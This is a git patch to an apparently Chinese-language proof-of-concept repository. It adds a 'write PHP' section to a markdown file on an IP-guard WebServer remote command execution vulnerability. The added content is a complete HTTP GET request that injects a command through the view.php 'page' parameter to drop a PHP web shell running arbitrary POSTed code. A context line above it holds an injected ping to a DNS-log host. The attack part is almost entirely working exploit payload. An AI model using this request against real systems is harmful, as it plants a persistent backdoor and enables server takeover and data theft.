From 2b66a29dff5a1659fe3c73763d811b62bb5625f5 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sun, 12 Nov 2023 21:38:04 +0800
Subject: [PATCH] =?UTF-8?q?Update=20IP-guard=20WebServer=20=E8=BF=9C?=
 =?UTF-8?q?=E7=A8=8B=E5=91=BD=E4=BB=A4=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E?=
 =?UTF-8?q?.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 IP-guard WebServer 远程命令执行漏洞.md | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/IP-guard WebServer 远程命令执行漏洞.md b/IP-guard WebServer 远程命令执行漏洞.md
index 72bed11..b97ca1e 100644
--- a/IP-guard WebServer 远程命令执行漏洞.md	
+++ b/IP-guard WebServer 远程命令执行漏洞.md	
@@ -16,6 +16,16 @@ IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软
 /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||ping%20dnslog
 ```
 
+## 写php
+```
+GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.jpg&format=swf&isSplit=true&page=||echo+^<?php+@mb_eregi_replace('.*',$_POST['a'],'','ee');?^>+>1.php HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+
 ## 漏洞复现
 
 ![](./assets/20231109165256.png)